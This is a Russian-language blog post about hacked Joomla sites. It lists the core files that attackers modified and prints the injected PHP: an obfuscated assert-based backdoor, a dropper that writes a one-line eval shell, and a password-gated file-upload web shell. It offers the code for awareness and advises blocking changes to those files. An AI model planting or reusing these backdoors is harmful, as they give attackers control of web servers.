Новосибирск +7(983)

По всем вопросам :

Столкнулся с изменением файлов на сайтах CSM Joomla, данные вписываются в базовые компоненты и библиотеку, злоумышленник делает загрузку файлов. профиклактика - заблокировать изменение этих файлов.

В поиске изменений помог компонент проверки файлов.

Ниже приведен код этого взлома, текст размещен для ознакомления, а не как инструкция к действию = ) 

 

Измененные файлы:

/components/com_contact/helpers/route.php

$content = '<?php (';$content .= '$_=';$content .= '@$_G';$content .= 'ET[c]).@$_($_P';;$content .= 'OS';$content .= 'T["f5a3p5"])?>';$file = fopen("com_contact_info.php", "w");fwrite($file, $content) ;

/components/com_media/media.php

isset($_REQUEST['f5a3p5']) && array_map("ass\x65rt",(array)$_REQUEST['f5a3p5']);

/includes/defines.php

isset($_REQUEST['f5a3p5']) && array_map("ass\x65rt",(array)$_REQUEST['f5a3p5']);

 

Далее размещается файл для загрузки файлов, было 3 случая, каждый раз разные файлы но в папке /libraries

/libraries/joomla/http/wrapper/cgi-f7.php

<?php if(md5($_GET["ms-load"])=="5637a21308208bf4b96294544bf880a2"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data" method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}

Также в корне сайта создается файл com_contact_info.php:

<?php ($_=@$_GET[c]).@$_($_POST["yp5s2z"])?>

 

Комментарии (0)

Здесь ещё нет оставленных комментариев.

Оставьте свой комментарий

  1. Добавление комментария от гостя.
Вложения (0 / 3)
Share Your Location

Как с нами связаться

По всем вопросам пишите  

OnLine заказ

Отправить сообщение

Нажимая на кнопку «Отправить сообщение», я соглашаюсь:
* с условиями публичной оферты
* обработку моих персональных данных


RAD компоненты

Please publish modules in offcanvas position.